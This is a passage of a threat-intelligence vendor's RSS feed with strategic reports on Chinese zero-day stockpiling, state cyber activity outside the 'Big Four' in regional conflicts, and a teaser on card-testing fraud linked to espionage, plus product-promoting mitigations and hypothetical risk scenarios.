        <p>Most vulnerability disclosures to affected vendors and the broader security community still originate from universities, labs, and cybersecurity firms associated with CNNVD, CNVD, and the expanding TSU network. However, even as the ecosystem grows, the overall volume of these disclosures continues to <a href="https://www.atlanticcouncil.org/in-depth-research-reports/report/sleight-of-hand-how-china-weaponizes-software-vulnerability/">decline</a>, indicating that a larger share of discoveries is now being routed <a href="https://www.recordedfuture.com/ko/blog/chinese-mss-vulnerability-influence">internally</a> rather than published. This suggests that more vulnerabilities are being withheld for state-directed use. Secrecy surrounding hacking competitions is also growing: The Tianfu Cup was not held publicly in 2024, and the 2024 Matrix Cup shared little to <a href="https://nattothoughts.substack.com/p/the-matrix-cup-cultivating-top-hacking">no details</a> about discovered exploits. These competitions have historically been major sources of high-quality vulnerabilities, and reduced transparency further aligns with the shift away from open disclosure.</p>
        <p>Together, these trends — the rapid expansion of TSUs, the decline in public vulnerability reporting, and the tightening secrecy around exploit-generation events — likely point to a deliberate state strategy that emphasizes centralized stockpiling and selective operational use of vulnerabilities rather than public disclosure.</p>
        <h3>Strategic Stockpiling and Selective Use</h3>
        <p>China’s <a href="https://cloud.google.com/blog/topics/threat-intelligence/2023-zero-day-trends">reported</a> use of zero-days declined from twelve in 2023 to five in 2024, and it is responsible for only ten of the 104 zero-day exploits identified globally so far in 2025. While this may partly reflect limited visibility into zero-day deployment and attribution, the trend may also suggest a more selective, strategic approach to when and how its zero-day capabilities are used.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_13d3e1d5ebec066cdcdff5beca720487d65e8ef26.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="816" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 3:</strong></em> <em>Of the 104 zero-days identified in 2025, ten were attributed to Chinese state-sponsored threat actors (Source: Recorded Future)</em></div>
          </div>
        </div>
        <p>Beijing’s control mechanisms under the RMSV and DSL enable it to selectively weaponize or withhold zero-days, preserving its most impactful capabilities for crises or strategic objectives. At the same time, n-day vulnerabilities — older but still unpatched flaws — remain highly effective due to inconsistent global patching.</p>
        <p>Using these known flaws allows Chinese operators to gain access to networks and gather intelligence without revealing their zero-day exploits. Overall, this reflects a system designed for long-term preparedness rather than immediate gain.</p>
        <h3>Military Integration and Strategic Significance</h3>
        <p>China’s April 2024 military reforms <a href="https://ndupress.ndu.edu/Media/News/News-Article-View/Article/4157257/a-new-step-in-chinas-military-reform/">introduced</a> three new divisions within the People’s Liberation Army (PLA), including two centered on cyber and information security:</p>
        <ul>
          <li>The Information Support Force (ISF), which is <a href="https://jamestown.org/program/a-disturbance-in-the-force-the-reorganization-of-peoples-liberation-army-command-and-elimination-of-chinas-strategic-support-force/">responsible</a> for the security and continuity of China’s military networks, data systems, and command infrastructure</li>
          <li>The Cyberspace Force (CSF), which is <a href="https://www.iiss.org/online-analysis/online-analysis/2024/05/chinas-new-information-support-force/">dedicated</a> to both offensive and defensive cyber operations</li>
        </ul>
        <p>Together, the two units consolidate China’s cyber and information capabilities, which were previously nested primarily under the PLA Strategic Support Force. These units form the backbone of its digital warfighting structure. The restructuring is likely to enhance Beijing’s ability to coordinate kinetic and cyber operations, with zero-days serving as key enablers and potential first-strike tools.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1e37fc1772617d06c2746e0f6deba2a514f7ffd2b.png?width=750&amp;format=png&amp;optimize=medium" width="1249" height="512" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 4:</strong></em> <em>New structure of the People’s Liberation Army (PLA) (Source:</em> <em><a href="https://jamestown.org/wp-content/uploads/2024/04/CB-V-24-Issue-9-April-26.pdf">The Jamestown Foundation</a>)</em></div>
          </div>
        </div>
        <p>The future use of zero-days will depend on how China decides to pursue its geostrategic goals, such as <a href="https://www.recordedfuture.com/ko/research/from-coercion-to-invasion-the-theory-and-execution-of-china-cyber-activity">future unification</a> with Taiwan. However, by compromising critical networks in advance, China can secure persistent access and deploy disruptive cyber effects alongside kinetic operations, as seen in Russia’s <a href="https://blogs.microsoft.com/on-the-issues/2022/06/22/defending-ukraine-early-lessons-from-the-cyber-war/">coordinated</a> cyber-military campaigns in Ukraine. Chinese state-sponsored <a href="https://app.recordedfuture.com/portal/intelligence-card/rWxgd_/overview">Volt Typhoon</a> activity has been widely assessed as fulfilling such a purpose.</p>
        <h2>Outlook</h2>
        <ul>
          <li><strong>Increased Willingness to Use Zero-Days:</strong> As China reduces its reliance on US technology through its “<a href="https://www.wsj.com/world/china/china-technology-software-delete-america-2b8ea89f?gaa_at=eafs&amp;gaa_n=AWEtsqePdzH3SRky1gFGa5OK6eLRoL78W2-ChzKYqbYaN8iUdsXKWF60d69fkSz8XTs%3D&amp;gaa_ts=68f7a71d&amp;gaa_sig=afo7Dvij1rhGpclsWz_RcXPU0MRK8PaKKNGOTG0Hj8LOLI9vBlFGl8iwGOQq2yx1FCUqK89rZf_PDBlddaDQvg%3D%3D">Delete America</a>” campaign, the cost of exploiting Western software will decrease, making zero-day use more attractive in future conflicts over the long term.</li>
          <li><strong>Expanded Pre-Positioning:</strong> Expect continued infiltration of critical infrastructure and enterprise systems through both n-day and zero-day exploits to ensure durable wartime access.</li>
          <li><strong>Increased N-day Use:</strong> The rapid adoption of AI-assisted coding and automation is accelerating the accumulation of software vulnerabilities. This expanding security debt — the accumulation of unpatched and unreviewed vulnerabilities — will give adversaries, including China, a broader and more persistent pool of n-day exploits to weaponize.</li>
          <li><strong>Evolving Contractor Ecosystem:</strong> State-aligned private firms are likely to accelerate automation and AI-assisted vulnerability discovery, thereby expanding the Chinese state’s operational stockpile of viable exploits.</li>
        </ul>
        <h2>Mitigations</h2>
        <ul>
          <li><strong>Adopt an “Assume Breach” Posture:</strong> Implement zero-trust architectures that enforce identity and device verification at every access point. Use <a href="http://recordedfuture.com/products/threat-intelligence">Recorded Future® Threat Intelligence</a> to monitor for China-nexus infrastructure and malicious activity, feeding enriched indicators directly into security information and event management (SIEM) and security orchestration, automation, and response (SOAR) workflows.</li>
          <li><strong>Prioritize Edge and Enterprise Patching:</strong> Focus remediation efforts on virtual private networks (VPNs), firewalls, hypervisors, and identity platforms most commonly targeted by China-nexus threat actors. Use <a href="https://www.recordedfuture.com/ko/products/vulnerability-intelligence">Recorded Future Vulnerability Intelligence</a> to track emerging zero-day and n-day threats, prioritize patching by exploitation risk, and validate remediation across critical systems.</li>
          <li><strong>Detect Post-Exploitation Behavior:</strong> Use D3FEND mappings such as Process Access Pattern Analysis (D3-PAPA) and Remote Access Detection (D3-RAD) to identify stealthy follow-on actions. Combine these controls with <a href="https://www.recordedfuture.com/ko/products/attack-surface-intelligence">Recorded Future Attack Surface Intelligence</a> to identify exposed assets and verify that detection coverage extends to externally facing environments.</li>
          <li><strong>Secure Identities and Access:</strong> Leverage <a href="https://www.recordedfuture.com/ko/products/identity-intelligence">Recorded Future Identity Intelligence</a> to detect compromised credentials that may complement exploit-based intrusions.</li>
        </ul>
        <h2>Risk Scenario</h2>
        <p><em>EnerTech Global</em>, a European energy technology firm providing control systems and smart grid software to multiple NATO-aligned countries, becomes the target of a Chinese state-sponsored cyber campaign. Using undisclosed zero-day vulnerabilities, Chinese operators infiltrate EnerTech’s production and customer environments to gather intelligence, manipulate software updates, and pre-position for potential disruption.</p>
        <h3>First-Order Implications</h3>
        <p>Chinese threat actors exploit a zero-day in a network management or VPN appliance to gain initial access to EnerTech’s internal systems and engineering networks.</p>
        <p>A zero-day in industrial control or software build pipelines is used to insert malicious code into firmware updates distributed to downstream customers.</p>
        <h4>Organizational Risks:</h4>
        <ul>
          <li><strong>Operational:</strong> Compromise of development and production networks halts manufacturing and disrupts customer support operations.</li>
          <li><strong>Legal:</strong> Breach of export-control and cybersecurity regulations triggers EU and US compliance investigations.</li>
          <li><strong>Brand:</strong> Public confirmation of a “state-backed breach” undermines trust with government and defense customers dependent on EnerTech’s technology.</li>
        </ul>
        <h3>Second-Order Implications</h3>
        <p>Attackers use stolen code-signing certificates to distribute trojanized software updates to energy utilities across Europe. Collected intelligence on grid infrastructure is used to map potential disruption points for future contingency operations.</p>
        <h4>Organizational Risks:</h4>
        <ul>
          <li><strong>Operational:</strong> Some utilities begin to see irregularities in their operational technology (OT) environments, including unexpected behavior in grid-monitoring tools, delayed telemetry updates, and unexplained authentication failures on systems that rely on EnerTech software.</li>
          <li><strong>Brand:</strong> EnerTech’s reputation deteriorates as customers and regulators question its software assurance and supply chain controls.</li>
          <li><strong>Legal:</strong> Disclosure of tampered software triggers international incident response coordination and potential export-license suspension.</li>
        </ul>
        <h3>Third-Order Implications</h3>
        <p>Persistent access enables China to remotely sabotage or disable systems during a geopolitical crisis, thereby amplifying disruption across allied power grids. Stolen intellectual property is used by Chinese competitors to replicate EnerTech’s industrial software, undercutting global market bids.</p>
        <h4>Organizational Risks:</h4>
        <ul>
          <li><strong>Competitive:</strong> Loss of proprietary code and technology enables China-based competitors to dominate regional procurement markets.</li>
          <li><strong>Brand:</strong> Association with a high-profile critical infrastructure breach erodes long-term credibility in both commercial and government sectors.</li>
          <li><strong>Legal:</strong> Multinational investigations and sanctions create enduring compliance exposure and financial penalties.</li>
        </ul>
        <h2>Further Reading</h2>
        <ul>
          <li><a href="https://www.recordedfuture.com/ko/research/redecho-targeting-indian-power-sector">China-linked Group RedEcho Targets the Indian Power Sector Amid Heightened Border Tensions</a></li>
          <li><a href="https://www.recordedfuture.com/ko/research/continued-targeting-of-indian-power-grid-assets">Continued Targeting of Indian Power Grid Assets by Chinese State-Sponsored Activity Group</a></li>
          <li><a href="https://www.recordedfuture.com/ko/research/from-coercion-to-invasion-the-theory-and-execution-of-china-cyber-activity">From Coercion to Invasion: The Theory and Execution of China’s Cyber Activity in Cross-Strait Relations</a></li>
          <li><a href="https://www.recordedfuture.com/ko/blog/chinese-mss-vulnerability-influence">China’s Ministry of State Security Likely Influences National Network Vulnerability Publications</a></li>
          <li><a href="https://www.iiss.org/online-analysis/online-analysis/2024/05/chinas-new-information-support-force/">China’s new Information Support Force</a></li>
        </ul>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/research/media_103d01df10dae3a07a40c46523f00a6b54d5aa865.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[The $0 Transaction That Signaled a Nation-State Cyberattack]]></title>
            <link>https://www.recordedfuture.com/ko/blog/transaction-that-signaled-nation-state-cyberattack</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/blog/transaction-that-signaled-nation-state-cyberattack</guid>
            <pubDate>Wed, 17 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[A $0 card test signaled a Chinese state-linked cyberattack on Anthropic’s AI platform. Learn how card-testing fraud intelligence spots nation-state ops early.]]></description>
            <content:encoded><![CDATA[
        <div>
          <div>
            <div>
              <h2>Key Points:</h2>
              <ul>
                <li>Fraud enables cyber operations: Threat actors used compromised payment cards validated through Chinese-operated card-testing services to attempt unauthorized access to Anthropic's AI platform during a reported state-sponsored espionage campaign.</li>
                <li><a href="https://www.recordedfuture.com/ko/products/payment-fraud-intelligence">Card testing</a> signals downstream attacks: The observed fraud followed a predictable kill chain—compromise, validation, resale, and attempted cashout—providing early warning <a href="https://www.recordedfuture.com/ko/threat-intelligence-101/intelligence-sources-collection/threat-intelligence-feeds">indicators</a> that preceded the final malicious transaction.</li>
                <li>Recorded Future’s take: Proactive fraud intelligence prevents broader threats. Tester merchant intelligence can identify compromised cards before they're used for high-value fraud or to support advanced threat actor operations.</li>
              </ul>
            </div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/blog/media_1b69b3987107eb35b9673377e1cac520995d23f77.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Cyber on the Geopolitical Battlefield: Beyond the “Big Four”]]></title>
            <link>https://www.recordedfuture.com/ko/research/cyber-geopolitical-battlefield</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/research/cyber-geopolitical-battlefield</guid>
            <pubDate>Wed, 17 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Offensive cyber operations are spreading beyond the Big Four. Discover how regional conflicts are driving new state-linked cyber threats.]]></description>
            <content:encoded><![CDATA[
        <h2>Executive Summary</h2>
        <p>Regional conflicts and weakened international institutions are driving the use of offensive cyber operations beyond the “Big Four” (China, Russia, Iran, and North Korea). Monitoring these threat actors requires organizations to <strong>proactively assess their geopolitical risk</strong> to understand where future threats are most likely to emerge.</p>
        <p>In 2025, Recorded Future identified at least <strong>twenty actors across thirteen “non-Big Four” countries</strong> conducting cyber operations, primarily linked to regional conflicts, domestic surveillance, or foreign espionage.</p>
        <p>Companies should closely monitor regional geopolitics and <strong>maintain strong continuity and resilience plans</strong> to protect against cyber espionage or disruptive cyberattacks.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_18967900e841d62eae716d18a4b04dcc4ae65efcb.png?width=750&amp;format=png&amp;optimize=medium" width="1194" height="668" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 1:</strong></em> <em>Trends influencing how and why state-sponsored actors beyond China, Russia, Iran, and North Korea carry out cyber operations (Source: Recorded Future)</em></div>
          </div>
        </div>
        <h2>Analysis</h2>
        <h3><em>Overview of Other State Sponsors of Cyber Operations</em></h3>
        <p>While the “Big Four” account for the majority of reported cyber threat activity, many other countries use cyber operations to advance their strategic interests. Recorded Future data shows that most observed activity outside of the “Big Four” stems from regional conflicts. Patriotic hacktivist groups, which advance state interests alongside state-sponsored espionage operations, represent the highest volume of reported activity. The degree of coordination between hacktivists and the government remains unclear and likely <a href="https://www.atlanticcouncil.org/wp-content/uploads/2012/02/022212_ACUS_NatlResponsibilityCyber.PDF">varies</a>. However, their actions are included in this assessment because of their close alignment with state objectives, which means their activity correlates with interstate conflict risk.</p>
        <p>Outside of active conflict, espionage against foreign and domestic targets continues to be a major driver of cyber operations. The most <a href="https://www.iiss.org/globalassets/media-library---content--migration/files/research-papers/cyber-power-report/cyber-capabilities-and-national-power---a-net-assessment___.pdf">cyber-capable</a> states invest heavily in avoiding detection and attribution, given the significant <a href="https://europe.unc.edu/wp-content/uploads/sites/314/2016/11/Brief_NSA_Leaks_Transatlantic_Relations_2014.pdf">negative</a> political consequences of exposure.</p>
        <p>Tracking threat actors beyond the Big Four requires organizations to understand their geopolitical risk in order to anticipate where threats are most likely to emerge. Operating in certain regions or conflict zones likely increases the risk of cyber espionage or destructive attacks.</p>
        <h3><em>Regional Cyber Conflicts</em></h3>
        <p>Territorial disputes drove nearly two-thirds of observed cyber activity in 2025, according to Recorded Future data. Cyber operations focused on intelligence collection against government, defense, and other critical infrastructure. Hacktivists escalated their activity during conflicts, carrying out nuisance-level attacks amplified through influence operations. Like hacktivists, influence operations align closely with state interests during conflict, but have varying degrees of connection to the state. These activities rarely affect battlefield outcomes but are designed to signal technical sophistication or moral superiority over the adversary.</p>
        <h4>India and Pakistan</h4>
        <p>Between May 7 and 10, 2025, India and Pakistan <a href="https://www.stimson.org/2025/four-days-in-may-the-india-pakistan-crisis-of-2025/">exchanged</a> a series of missile strikes — the most serious escalation between the two nuclear-armed countries in decades. Throughout the crisis, large volunteer hacktivist communities on both sides conducted disruptive attacks, <a href="https://www.rusi.org/explore-our-research/publications/commentary/operation-sindoor-and-india-pakistans-escalated-rivalry-cyberspace">primarily</a> DDoS and website defacements. Pakistan-linked APT36 <a href="https://www.cyfirma.com/research/apt36-targets-indian-boss-linux-systems-with-weaponized-autostart-files/">conducted</a> espionage operations <a href="https://www.trendmicro.com/en_us/research/22/a/investigating-apt36-or-earth-karkaddans-attack-chain-and-malware.html">targeting</a> the Indian government and other politically motivated targets, while threat actors linked to the Indian government, such as SideWinder, pursued Pakistani <a href="https://www.acronis.com/en/tru/posts/from-banks-to-battalions-sidewinders-attacks-on-south-asias-public-sector/">military</a> targets.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1a9881b0bdbc5c31c2a924c1974d48e4684a87fe0.png?width=750&amp;format=png&amp;optimize=medium" width="1140" height="628" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 2:</strong></em> <em>Cyber activity between India and Pakistan spiked alongside the outbreak of armed conflict in May 2025 (Source:</em> <em><a href="https://www.recordedfuture.com/ko/research/influence-operations-and-conflict-escalation-in-south-asia">Recorded Future</a>)</em></div>
          </div>
        </div>
        <p>Influence operations intended to shape perceptions of the conflict also <a href="https://www.recordedfuture.com/ko/research/influence-operations-and-conflict-escalation-in-south-asia">intensified</a>. Influence networks amplified hacktivist claims, often overstating their impact, such as <a href="https://www.hindustantimes.com/trending/pib-debunks-claim-that-pakistani-hackers-crippled-70-of-india-s-power-grid-101747134385434.html">widespread reporting</a> on Pakistani social media that hackers had shut down 70% of India’s electric grid. These operations are intended to portray their own side as more capable and their adversary as vulnerable, underscoring the importance of narrative control in conjunction with military operations.</p>
        <h4>Thailand and Cambodia</h4>
        <p>Similar to cyber engagements observed between India and Pakistan, hacktivist operations bolstered by influence campaigns <a href="https://moderndiplomacy.eu/2025/07/21/cyber-clashes-between-cambodia-and-thailand-threaten-asean-stability/">significantly escalated</a> between Thai hackers and Cambodian hackers following the <a href="https://www.politico.com/news/2025/07/23/thai-and-cambodian-soldiers-fire-at-each-other-in-disputed-border-area-00473426">May 2025</a> conflict. These were largely carried out by self-proclaimed patriotic hacktivist groups. Operations included DDoS attacks, website defacements, and data leak operations. More targeted <a href="https://www.cnn.com/2025/07/01/asia/thailand-pm-paetongtarn-suspended-intl-hnk">hack-</a><a href="https://www.bangkokpost.com/thailand/general/3083900/cyber-cops-send-leaked-hun-sen-audio-file-to-oag">and-leak</a> operations were also intended to reveal politically damaging information about the other country’s leadership. Influence operation narratives emphasized that the opposing side was the aggressor in the conflict, likely in order to garner both domestic and international support.</p>
        <h4>Morocco and Algeria</h4>
        <p>While <a href="https://www.cyfirma.com/research/explainer-the-algeria-morocco-tensions/">tensions</a> between Morocco and Algeria have not escalated into armed conflict, cyber hostilities increased significantly in 2025. In the context of these tensions, pro-Algerian hacktivists have allegedly carried out a series of high-profile attacks on Moroccan institutions, <a href="https://therecord.media/morocco-investigates-breach-hackers-algeria">striking</a> the National Social Security Fund, the <a href="https://cybelangel.com/blog/ancfcc-data-leak-flash-report/">National Agency for Land Conservation</a>, and the <a href="https://www.moroccoworldnews.com/2025/06/210448/algerias-jabaroot-targets-justice-ministry-in-latest-cyberattack-on-moroccan-institutions/">Ministry of Justice</a>. The hackers, going by JabaROOT, leaked personal and financial data of millions of Moroccan citizens, potentially exacerbating existing domestic tensions over income disparity. The cyberattacks may have been intended to demonstrate Moroccan vulnerability while maintaining a level of deniability for the Algerian government. Moroccan hacktivists responded with <a href="https://izoologic.com/region/africa/morocco-data-breach-sparks-wave-of-cyber-retaliations/">retaliatory data breaches</a> against the Algerian government and education institutions.</p>
        <h3><em>Espionage Operations Outside of Armed Conflict</em></h3>
        <p>While many more countries almost certainly engage in cyber espionage, the following threat actors have been tracked attempting to collect information on targets of political significance:</p>
        <ul>
          <li>While <strong>India-linked</strong> threat actors such as <a href="https://securelist.com/sidewinder-apt-updates-its-toolset-and-targets-nuclear-sector/115847/">SideWinder</a> and <a href="https://www.proofpoint.com/us/blog/threat-insight/bitter-end-unraveling-eight-years-espionage-antics-part-one">Bitter</a> have traditionally targeted neighbors like Pakistan, Sri Lanka, and Bangladesh, espionage against European diplomatic entities <a href="https://www.enisa.europa.eu/sites/default/files/2025-10/ENISA%20Threat%20Landscape%202025.pdf">increased</a> significantly in 2024, demonstrating a broader targeting scope.</li>
          <li><strong>Vietnam</strong> has <a href="https://www.aspeninstitute.org/publications/the-rise-of-the-rest-maturing-cyber-threats-beyond-the-big-four/">accelerated</a> its development of cyber capabilities. APT32, likely linked to the Vietnamese government, has carried out <a href="https://gbhackers.com/apt32-hacker-group-poisoning-github/">operations</a> against Chinese cybersecurity researchers as well as against internal <a href="https://thehackernews.com/2024/08/vietnamese-human-rights-group-targeted.html">dissidents</a>. In the past, this group has also targeted <a href="https://cyberscoop.com/apt32-ocean-lotus-vietnam-car-companies-hacked/">car manufacturers</a>, <a href="https://www.recordedfuture.com/ko/research/apt32-malware-campaign">foreign governments</a>, and others, driven by geopolitical and economic priorities.</li>
          <li>At least two threat actor groups observed conducting espionage operations have been linked to <strong>Türkiye</strong>: <a href="https://www.microsoft.com/en-us/security/blog/2025/05/12/marbled-dust-leverages-zero-day-in-output-messenger-for-regional-espionage/">Marbled Dust</a> and <a href="https://cyberscoop.com/strongpity-apt-alien-labs-turkey/">StrongPity</a>, who prioritize regional and domestic targets. In addition, a <a href="https://assets.recordedfuture.com/insikt-report-pdfs/2023/cta-2023-0112.pdf">robust online community</a> of patriotic hacktivists targets regional and international adversaries, whether historical (such as Armenia and Greece) or in modern disputes (France and Germany).</li>
          <li>Stealth Falcon, <a href="https://attack.mitre.org/groups/G0038/">linked</a> to the <strong>United Arab Emirates</strong>, has been <a href="https://blog.checkpoint.com/research/inside-stealth-falcons-espionage-campaign-using-a-microsoft-zero-day/">observed</a> exploiting a zero-day vulnerability to target a Turkish defense organization. The group has been active since at least 2016, targeting government and defense organizations primarily in the Middle East and Africa.</li>
        </ul>
        <p>Political and diplomatic priorities make intelligence targets predictable. Organizations should assess not only their regional exposure but also whether their industry aligns with strategic priorities, as sectors tied to national strategy are the most likely targets for espionage.</p>
        <h3><em>Domestic Surveillance Activity</em></h3>
        <p>Many states use their cyber capabilities to monitor domestic security concerns, which can include law enforcement or national security priorities, monitoring political opposition, or conducting economic espionage on behalf of a key national industry. Domestic surveillance capabilities are often supplemented with commercial off-the-shelf spyware, such as Intellexa’s <a href="https://www.recordedfuture.com/ko/research/intellexas-global-corporate-web">Predator</a> or Candiru’s <a href="https://www.recordedfuture.com/ko/research/tracking-candirus-devilstongue-spyware">DevilsTongue</a>. Similar to understanding political priorities for cross-border espionage, companies should assess whether they possess data that may be of political significance to the government of a country in which they operate. States that lack sufficient oversight or legal privacy protections <a href="https://substack.com/inbox/post/180401534?r=3g10gt&amp;utm_medium=ios&amp;triedRedirect=true">pose an increased risk</a> of intrusive cyber monitoring and surveillance.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1266d09a14347a2b84e82e385594f3abfe78022ec.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="835" />
            </div>
          </div>
          <div>
            <div>
              <p><em><strong>Figure 3:</strong></em> <em>(Left) Graphical representation from the Insikt Group report titled Dark Covenant of the direct and indirect links between Russian Intelligence Services and individuals in the Russian cybercriminal underground; (Right) Infographic of reported cyberattack by Russian state-backed ransomware operators against German military contractors</em></p>
              <p><em>(Source: Recorded Future)</em></p>
            </div>
          </div>
        </div>
        <h2>Outlook</h2>
        <ul>
          <li><strong>Cyberattacks are likely to increase as international alliances weaken</strong>: The Thailand-Cambodia and India-Pakistan conflicts demonstrate an increased willingness to use force to pursue regional goals. Deployments in multilateral peacekeeping operations <a href="https://www.sipri.org/media/press-release/2025/peace-operation-deployments-fall-40-per-cent">decreased by 40%</a> over the last decade, likely due to challenges in generating the necessary support for intervention. This makes it more likely that states will turn to violence to resolve disputes, as opposed to non-violent negotiations. Cyber and influence operations are becoming increasingly common features in these conflicts, serving as a low-cost means of signaling strength, shaping narratives, and imposing limited disruption.</li>
          <li><strong>Cyber capability build-up may follow conventional military build-up:</strong> NATO countries in <a href="https://www.voanews.com/a/billion-rearmament-plan-fuels-european-defense-stocks/8002455.html">Europe</a>, as well as South Korea and <a href="https://apnews.com/article/japan-military-budget-us-australia-china-f82c70bd6f5cbfc184f15cf17f2fde21">Japan</a>, are increasing their military spending. While many of these countries already have advanced cyber capabilities, they may seek to invest in more sophisticated offensive capabilities to augment conventional forces. Legal and doctrinal changes, such as in <a href="https://therecord.media/japan-enacts-new-law-allowing-offensive-cyber-operations">Japan</a> and <a href="https://www.csis.org/blogs/strategic-technologies-blog/south-koreas-2024-cyber-strategy-primer">South Korea</a>, are also laying the groundwork for a shift from a defensive cyber policy to an offensive posture.</li>
          <li><strong>Commercial cyber capabilities may be sought for interstate conflict:</strong> Countries seeking to gain a cyber advantage in advance of a regional conflict may turn to commercial offensive tools, similar to the <a href="https://therecord.media/spyware-purchased-by-eighty-countries-gchq-warns">growing reliance</a> on these tools for internal law enforcement or counterterrorism operations. This reduces the barrier to entry for smaller or less technically mature states, enabling more actors to conduct sophisticated intrusions, targeted espionage, and high-impact disruption.</li>
        </ul>
        <h2>Mitigations</h2>
        <ul>
          <li>Use Recorded Future’s <a href="https://www.recordedfuture.com/ko/products/geopolitical-intelligence">Geopolitical Intelligence</a> to monitor regional conflicts and geopolitical developments for risks to international and outsourced operations.</li>
          <li>Use Recorded Future’s <a href="https://www.recordedfuture.com/ko/products/threat-intelligence">Threat Intelligence</a> to track threat actor groups and detect TTPs associated with non-Big Four countries.</li>
          <li>Understand the risk of surveillance for personnel traveling to high-risk countries and take mitigating actions such as using alternative devices. Use Recorded Future’s Country Risk Data in the <a href="https://www.recordedfuture.com/ko/products/geopolitical-intelligence">Geopolitical Intelligence</a> module to assess surveillance and other travel risks.</li>
          <li>Ensure continuity-of-operations plans are in place to mitigate the impacts of disruptive or destructive attacks. Use Recorded Future <a href="https://www.recordedfuture.com/ko/services/analyst-on-demand">Analyst-on-Demand</a> for bespoke research on how your organization might be targeted.</li>
        </ul>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1cdc94730e147e8664f08d34340f7be84e08d6510.png?width=750&amp;format=png&amp;optimize=medium" width="1304" height="724" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 4:</strong></em> <em>Starting with these four questions can help you understand threat actors’ motivations for targeting your organization (Source: Recorded Future)</em></div>
          </div>
        </div>
        <h2>Risk Scenario</h2>
        <p><em>A longstanding territorial dispute between Country A and Country B erupts into a military skirmish at the border, with risks of further escalation. Country A is home to a robust business process outsourcing industry serving some of the world’s largest international corporations.</em></p>
        <h3>First-Order Implications</h3>
        <p>Groups claiming to be patriotic hacktivists from both countries conduct hack-and-leak operations and website defacements. These are amplified by partisans on social media who often exaggerate the impact of these attacks.</p>
        <ul>
          <li><strong>Competitive disadvantage:</strong> Hack-and-leak operations expose sensitive internal documents, including proprietary trade secrets and embarrassing communications.</li>
          <li><strong>Increased surveillance risk:</strong> The conflict increases domestic surveillance activity in Country B to monitor for internal threats. International employees traveling to Country B are subject to enhanced surveillance.</li>
        </ul>
        <h3>Second-Order Implications</h3>
        <p>Actors claiming to be hacktivists supporting Country A escalate cyber operations, carrying out persistent cyberattacks against Country B’s electrical grid. As a result, Country B experiences rolling blackouts in the capital city.</p>
        <ul>
          <li><strong>Operational disruption:</strong> The blackouts prevent call centers from performing essential business functions, resulting in significant service delays and revenue losses for corporations worldwide.</li>
          <li><strong>Physical security risk:</strong> Anger over blackouts increases public support for escalating operations against Country A. The escalation of conflict increases the risk of harm to employees or the destruction of facilities.</li>
        </ul>
        <h3>Third-Order Implications</h3>
        <p>The United States and China become increasingly involved in the conflict between Country A and Country B, providing military, logistical, and cyber capabilities to their preferred country. The external support prolongs the conflict and increases the risk of involving neighboring countries.</p>
        <ul>
          <li><strong>Conflict escalation:</strong> With more weapons and logistical support from great power backers, fighting between Country A and Country B expands from the border to strikes further in the interior. Both military and civilian casualties increase as violence escalates.</li>
          <li><strong>Regional economic impact:</strong> Extended disruptions may cause international corporations to move operations to more stable regions, leading to a negative economic impact in the region.</li>
        </ul>
        <h2>Further Reading</h2>
        <ul>
          <li><a href="https://www.recordedfuture.com/ko/research/influence-operations-and-conflict-escalation-in-south-asia">Influence Operations and Conflict Escalation in South Asia</a></li>
          <li><a href="https://www.recordedfuture.com/ko/research/apt32-malware-campaign">New APT32 Malware Campaign Targets Cambodian Government</a></li>
          <li><a href="https://substack.com/inbox/post/180401534?r=3g10gt&amp;utm_medium=ios&amp;triedRedirect=true">From Pegasus to Pall Mall: Managing Risks of Offensive Cyber Capabilities</a></li>
          <li><a href="https://assets.recordedfuture.com/insikt-report-pdfs/2023/cta-2023-0112.pdf">Current Trends in the Turkish Language Dark Web</a></li>
        </ul>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/research/media_1a43602f57ec7a07f0637d7b7010998c1f0bcbc8d.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[What’s Next for Enterprise Threat Intelligence in 2026]]></title>
            <link>https://www.recordedfuture.com/ko/blog/whats-next-for-enterprise-threat-intelligence-in-2026</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/blog/whats-next-for-enterprise-threat-intelligence-in-2026</guid>
            <pubDate>Mon, 15 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Top enterprise threat intelligence trends for 2026: AI-augmented CTI, unified platforms, workflow integration, data fusion, budgets, ROI, and maturity.]]></description>
            <content:encoded><![CDATA[
        <h2>Introduction</h2>
        <p>The cybersecurity landscape is rapidly growing in scale and complexity. Enterprises face a rising tide of sophisticated threats that cannot be contained by traditional, reactive defenses alone. With AI and automation lowering the barrier to entry for attackers exploiting new avenues, there is more opportunity than ever for disruptive, high-volume attacks.</p>
